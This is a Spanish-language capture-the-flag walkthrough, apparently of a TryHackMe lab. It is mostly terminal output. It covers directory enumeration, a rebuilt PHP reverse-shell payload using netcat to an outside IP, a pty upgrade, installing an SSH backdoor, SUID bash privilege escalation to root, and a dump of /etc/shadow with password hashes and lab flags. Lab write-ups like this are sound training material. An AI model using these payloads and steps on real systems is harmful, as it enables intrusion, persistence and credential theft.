by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.217.114
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2024/02/13 13:51:21 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/aboutus (Status: 301) [Size: 316] [--> http://10.10.217.114/aboutus/]
/css (Status: 301) [Size: 312] [--> http://10.10.217.114/css/]
/downloads (Status: 301) [Size: 318] [--> http://10.10.217.114/downloads/]
/img (Status: 301) [Size: 312] [--> http://10.10.217.114/img/]
/index.html (Status: 200) [Size: 815]
/server-status (Status: 403) [Size: 278]
===============================================================
2024/02/13 13:51:22 Finished
===============================================================
*******************************************************************************************************************************
---------- RECREAMOS EN LIMPIO TODO LOS COMANDOS Y PASOS QUE REALIZO EL ATACANTE EN Y PARA NUESTRO SERVIDOR VICTIMA ----------
GET /developmen/uploads/payload.php (PAYLOAD= <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>)
id
python3 -c 'import pty;pty.spawn("/bin/bash")'
ls -lAh
cat .overpass
su james (Password: whenevernoteartinstant)
cd ~
sudo -l
sudo cat /etc/shadow
git clone https://github.com/NinjaJc01/ssh-backdoor
cd ssh-backdoor
ssh-keygen (nombre archivo: id_rsa)
chmod +x backdoor
./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
<9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
(LA CONTRASEÑA DEL HASH QUE PASO AL BACKDOOR JUNTO CON EL SALT DEL SCRIPT ERA: november16 QUE SEGURAMENTE USO EL ATACANTE LUEGO PARA CONECTARSE POR SSH A ESTE BACKDOOR)
---------------------------------------------------------------------------------------------------------
*********************************************************************************************************
PROBAMOS CONECTARNOS CON LOS HASH Y SALT y password : november16 y bingo nos conectamos: 10.10.112.242 599bd7873bd4032d
┌──(root㉿kali)-[~]
└─# cat publickey.txt
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05
┌──(root㉿kali)-[~]
└─# ssh -oHostKeyAlgorithms=+ssh-rsa -p 2222 -i publickey.txt james@10.10.217.114
The authenticity of host '[10.10.217.114]:2222 ([10.10.217.114]:2222)' can't be established.
RSA key fingerprint is SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.217.114]:2222' (RSA) to the list of known hosts.
james@10.10.217.114's password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
james@overpass-production:/home/james/ssh-backdoor$ whoami
james
james@overpass-production:/home/james/ssh-backdoor$ sudo -l
[sudo] password for james:
Sorry, try again.
[sudo] password for james:
Sorry, try again.
[sudo] password for james:
sudo: 2 incorrect password attempts
james@overpass-production:/home/james/ssh-backdoor$ sudo cat /etc/shadow
[sudo] password for james:
Sorry, try again.
[sudo] password for james:
sudo: 1 incorrect password attempt
NALIZANDO LOS ARCHIVOS CON BIT SUID ACTIVO ENCONTRAMOS UNO .SUID_BASH pero ejecutandolo ASI NOMAS SIN PARAMETROS NOS DA UNA SHELL PERO COMO JAMES, SOLO CONSEGUIMOS POR AHORA LA BANDERA DE JAMES USER:
james@overpass-production:/home/james/ssh-backdoor$ ls
README.md backdoor.service cooctus.png id_rsa.pub main.go
backdoor build.sh id_rsa index.html setup.sh
james@overpass-production:/home/james/ssh-backdoor$ cd ..
james@overpass-production:/home/james$ ls
ssh-backdoor user.txt www
james@overpass-production:/home/james$ cat user.txt
thm{d119b4fa8c497ddb0525f7ad200e6567}
BUSCAMOS ARCHIVOS BIT SUID ACTIVOS:
james@overpass-production:/home$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/bin/mount
/bin/fusermount
/bin/su
/bin/ping
/bin/umount
/home/james/.suid_bash
DESCUBRIMOS EN OBCIONES QEU TENIA EL ARCHIVO .SUID_BASH DENTRO LEGIBLES Y SALIA UN PARAMETRO -p PARA EJECUTARLO JUNTO CON EL EN LA LINEA DE COMANDO PARA ESPECIFICARLE QUE TENGA ACCESO A TODAS LAS RUTAS DEL $PATH Y BINGO SE TENZO CONSEGUIMOS SER ROOT :D :
james@overpass-production:/home/james$ ./.suid_bash -p
.suid_bash-4.4# whoami
root
.suid_bash-4.4# cd /root
.suid_bash-4.4# ls
root.txt
.suid_bash-4.4# cat root.txt
thm{d53b2684f169360bb9606c333873144d}
LUEGO ANALIZANDO BIREN EL SCRIPT CON BIT SUID VIMOS LOS PARAMETROS PARA MANEJARLO POR LINEA DE COMANDO Y HASTA LOGRAMOS SOLO EJECUTAR COMANDOS COMO ROOT CON EL SIN OPTENER DIRECTAMENTE LA SHELL; LO PROBAMOS POARA COMPRENDER MEJOR EL SCRIPT:
james@overpass-production:/home/james$ ./.suid_bash -c whoami
james
james@overpass-production:/home/james$ ./.suid_bash -p -c whoami
root
james@overpass-production:/home/james$ ./.suid_bash -p -c cat /etc/shadow
^C
james@overpass-production:/home/james$ ./.suid_bash -p -c "cat /etc/shadow"
root:*:18295:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
sshd:*:18464:0:99999:7:::
james:$6$o23rmAtq$FabncpS1b85LDz9DfBShXj.hJXYIcGf1KdKJZP/3x3bGUJpP6Kvfc0JT8IkDaLbImCPGRPMUgXtA2NHLu8DEp1:18464:0:99999:7:::
paradox:$6$FVl2Uugb$TGpvNxRQWDYpK/lj505LDgdcrMCMN2e4c5MJ.YhVoZY7bRNwAZ2S24XapBm/s5s59tfrc4528tvrlJoNpJI2i0:18464:0:99999:7:::
szymex:$6$VwSYCytA$f.OYSpSkouPHPxd..Y3.Kdtm0P/Dc1lmHn722NO6.tj39r87KtOx7L0lIlJxYoDChkN4q/93cXg3MIMDZSPD00:18464:0:99999:7:::
bee:$6$ebKaOMGO$Pe7KvyDzaLctd1.SRSdiud.VSmokU5/Fla4VnDpNVMtk6TKmHcxb3kyGcUcFv89YTq9LuwoYtmnXLKz/X2Yu9.:18464:0:99999:7:::
muirland:$6$nESmZyzG$IcXb5muWfGIMK3ZsZa7Ml/DvQGTTzK8P.XKnCeRlPjP13shRrSjGnSQFCXhWOR.6It.VTLNOQnQt9pU.klTBu.:18464:0:99999:7:::
james@overpass-production:/home/james$ ./.suid_bash -p -O
autocd off
cdable_vars off
cdspell off
checkhash off
checkjobs off
checkwinsize off
cmdhist on
compat31 off
compat32 off
compat40 off
compat41 off
compat42 off
compat43 off
complete_fullquote on
direxpand off
dirspell off
dotglob off
execfail off
expand_aliases off
extdebug off
extglob off
extquote on
failglob off
force_fignore on
globasciiranges off
globstar off
gnu_errfmt off
histappend off
histreedit off
histverify off
hostcomplete on
huponexit off
inherit_errexit off
interactive_comments on
lastpipe off
lithist off
login_shell off
mailwarn off
no_empty_cmd_completion off
nocaseglob off
nocasematch off
nullglob off
progcomp on
promptvars on
restricted_shell off
shift_verbose off
sourcepath on
xpg_echo off
.suid_bash-4.4# exit
exit
Last updated